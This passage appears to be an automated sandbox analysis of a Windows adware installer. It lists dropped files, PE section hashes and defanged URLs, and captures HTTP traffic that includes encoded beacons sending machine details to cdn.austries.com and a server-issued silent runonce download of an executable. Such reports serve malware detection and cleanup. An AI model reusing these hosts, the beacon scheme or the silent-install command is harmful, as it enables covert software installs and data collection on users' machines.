%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.1.0.31
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.31
File Description:
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 77824 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 225280 | 16944 | 17408 | 4.08558 | e9d00de7898ae3a42a8383ed8a0b0e7f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 287
Network Activity
URLs
URL | IP |
---|---|
hxxp://ghs.googlehosted.com/rp/v/image.jpg | |
hxxp://ghs.googlehosted.com/wrp/ri | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | |
hxxp://s3-1.amazonaws.com/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 | |
hxxp://dildmbfdhsxh6.cloudfront.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 | |
hxxp://ghs.googlehosted.com/up/v/update | |
hxxp://cojun15cart.com/download.php?kHmDdWc= | |
hxxp://cds.i9x9t3x4.hwcdn.net/testadsreel_10656.exe | |
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php | |
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php | |
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_12_HD.zip | |
hxxp://cds.i9x9t3x4.hwcdn.net/os/rm/OfferScreen_422.zip | |
hxxp://dildmbfdhsxh6.cloudfront.net/core/ammapp.js?x=1&cb=1441686154118&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/core/lgv.js?r=9&cb=1441686154352&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 | |
hxxp://dildmbfdhsxh6.cloudfront.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 | |
hxxp://s3.zawss.info/client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | 54.231.18.192 |
hxxp://cdn.austries.com/up/v/update | 64.233.166.121 |
hxxp://s.xcodelib.net/amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 | 54.230.200.28 |
hxxp://s10100019.xcodelib.net/amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 | 54.230.200.81 |
hxxp://www.cojun15cart.com/download.php?kHmDdWc= | 23.22.255.164 |
hxxp://s.xcodelib.net/core/ammapp.js?x=1&cb=1441686154118&yt=81 | 54.230.200.28 |
hxxp://secured.nmsgv.us/testadsreel_10656.exe | 69.16.175.42 |
hxxp://s.xcodelib.net/core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 | 54.230.200.28 |
hxxp://s.xcodelib.net/core/lgv.js?r=9&cb=1441686154352&yt=81 | 54.230.200.28 |
hxxp://cdn.austries.com/rp/v/image.jpg | 64.233.166.121 |
hxxp://s3.zawss.info/client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 | 54.231.18.192 |
hxxp://s3.zawss.info/client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 | 54.231.18.192 |
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php | 50.97.62.154 |
hxxp://s.xcodelib.net/amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 | 54.230.200.28 |
hxxp://s.xcodelib.net/core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 | 54.230.200.28 |
hxxp://cdn.austries.com/wrp/ri | 64.233.166.121 |
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip | 69.16.175.42 |
hxxp://s.xcodelib.net/core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 | 54.230.200.28 |
hxxp://secured.nmsgv.us/os/rm/OfferScreen_422.zip | 69.16.175.42 |
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php | 50.97.62.154 |
www.xcodelib.net | 107.21.244.247 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /download.php?kHmDdWc= HTTP/1.1
Host: VVV.cojun15cart.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Tue, 08 Sep 2015 04:22:23 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Content-Disposition: attachment; filename="InstallMonetizer.exe"
Location: hXXp://secured.nmsgv.us/testadsreel_10656.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 400
Connection: Keep-Alive
key=jZKJflaCh4yNeoWFeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1J&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:17 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /up/v/update HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 420
Connection: Keep-Alive
key=jZKJflaOiX16jX4/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT97joJ9VkpJST+QhI2GVkpNP4WNhlZJUXhJUnhJUHhLS3hLTz98e1ZKTU1KT1FPSk1PP5FWTUlR&x=1
HTTP/1.1 200 OK
Content-type: text/plain
Date: Tue, 08 Sep 2015 04:22:22 GMT
Server: Google Frontend
Cache-Control: private
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
86..<runonce><runid>4006WIM20150908</runid><silent>yes</silent><url>hXXp://VVV.cojun15cart.com/download.php?kHmDdWc=</url></runonce>....0..
GET /core/ammapp.js?x=1&cb=1441686154118&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 1470
Connection: keep-alive
Date: Mon, 07 Sep 2015 20:21:16 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 20:21:16 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 29217
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: OUjlVNVWrwWqS5UHlwhs6jHawXq6NVa9ifQH-SpoIt0RqZCClnuX6A==
<<< skipped >>>
GET /core/lgv.js?r=9&cb=1441686154352&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 102
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:20:57 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Tue, 08 Sep 2015 04:35:57 GMT
Content-Encoding: gzip
Age: 437
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 55gZ6s2yXPBD0WAPSlZdaNfJROtUR5fnPbuRP_a2P5C-uuxRG3anAQ==
GET /core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 3070
Connection: keep-alive
Date: Mon, 07 Sep 2015 12:57:48 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 12:57:48 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 55825
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YknyOl6Reueyt-IqpzowiZxk9Ed0BKy261VruzTlyP3kGbOikTYnoA==
<<< skipped >>>
GET /core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 216
Connection: keep-alive
Date: Tue, 08 Sep 2015 03:55:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: maxage=10800
Expires: Tue, 08 Sep 2015 06:55:24 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 1970
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: VsqRng2sy7iGQK1Y0hvzBfI1kcGHi3wzFTr2P2B2lRQWqTdNo7eL5A==
GET /core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 151
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:26:25 GMT
Server: Apache
Accept-Ranges: bytes
Content-Encoding: gzip
Age: 110
Vary: Accept-Encoding
X-Cache: Error from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nUKE1JrK9pKlJThHr6gzXX1elOtb_Hm8J0WVvImSrma9VEWf3AcPNA==
GET /amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 136
Connection: keep-alive
Date: Mon, 07 Sep 2015 05:23:18 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 05:23:18 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 83095
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rDjR3EpN1bKBLx_9rc8RKRlDTjekxDM7_K9zG9kRxzXlpy9ZbBwDCQ==
GET /amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Content-Length: 1547
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:28:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Tue, 08 Sep 2015 04:28:15 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bgnnClCiMBQoS66pM0HzS4SFv6JRlZMcaCIjd79BsUPE3IIPj4-cxg==
<<< skipped >>>
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 96
Connection: Keep-Alive
key=jZKJflaLST96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:00 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /wrp/ri HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 126
Connection: Keep-Alive
key=hnp8VklJSVxLUl9dTk5aXT96f3+CfVZKSUpJSUlKUj99jItWh4iHfj+Ji4ZWSUlJXEtSX11OTlpdP4KMj4ZWSj+Pho1WSz98e1ZKTU1KT1FPSktN&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: text; charset=UTF-8
Date: Tue, 08 Sep 2015 04:22:02 GMT
Server: Google Frontend
Content-Length: 4
SklJ
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 280
Connection: Keep-Alive
key=jZKJflaLjI16i40/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:02 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 288
Connection: Keep-Alive
key=jZKJflaHjIKMjI16i414gn4/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:04 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 280
Connection: Keep-Alive
key=jZKJflaOh3+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:05 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 292
Connection: Keep-Alive
key=jZKJflZ+kY2LfI1/goeCjIE/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:05 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 284
Connection: Keep-Alive
key=jZKJflaHjIKMeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:15 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;
GET /testadsreel_10656.exe HTTP/1.1
Host: secured.nmsgv.us
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441631504"
Last-Modified: Mon, 07 Sep 2015 13:11:44 GMT
Cache-Control: max-age=32721
Content-Length: 228307
Content-Type: application/octet-stream
X-HW: 1441686143.dop009.fr7.t,1441686143.cds015.fr7.c
<<< skipped >>>
GET /client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=
x-amz-request-id: 3DEF045CAF143D99
Date: Tue, 08 Sep 2015 04:22:10 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>
GET /client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=
x-amz-request-id: D796A67BE3DB4F2A
Date: Tue, 08 Sep 2015 04:22:19 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
